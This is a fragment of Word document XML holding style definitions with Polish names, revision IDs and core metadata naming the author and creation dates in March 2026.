    <w:rsid w:val="004700EE"/>
    <w:rsid w:val="00533F84"/>
    <w:rsid w:val="005A02E2"/>
    <w:rsid w:val="007C5FBC"/>
    <w:rsid w:val="0090246C"/>
    <w:rsid w:val="00A041BA"/>
    <w:rsid w:val="00A34DD3"/>
    <w:rsid w:val="00CA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FD1F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{95004018-EFE3-4F0D-BDF1-0AA0E561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7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7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77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7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77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7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7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7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7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77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77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77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77D8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77D8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77D8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77D8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77D8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77D8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7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7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7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7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7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77D8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77D8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77D8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77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77D8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77D8C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533F8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114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148C7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Stopka">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normalny"/>
    <w:link w:val="StopkaZnak"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00114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148C7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalnyWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normalny"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C7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1C710C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-2777">
    <w:name w:val="citation-2777"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="001C710C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-2776">
    <w:name w:val="citation-2776"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="001C710C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-2775">
    <w:name w:val="citation-2775"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="001C710C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-2857">
    <w:name w:val="citation-2857"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="001C710C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-2856">
    <w:name w:val="citation-2856"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="001C710C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-2855">
    <w:name w:val="citation-2855"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="001C710C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-2891">
    <w:name w:val="citation-2891"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="001765E8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-2890">
    <w:name w:val="citation-2890"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="001765E8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-2889">
    <w:name w:val="citation-2889"/>
    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
    <w:rsid w:val="0017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405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Wojtyra</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Paweł Wojtyra</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-28T19:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-28T22:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>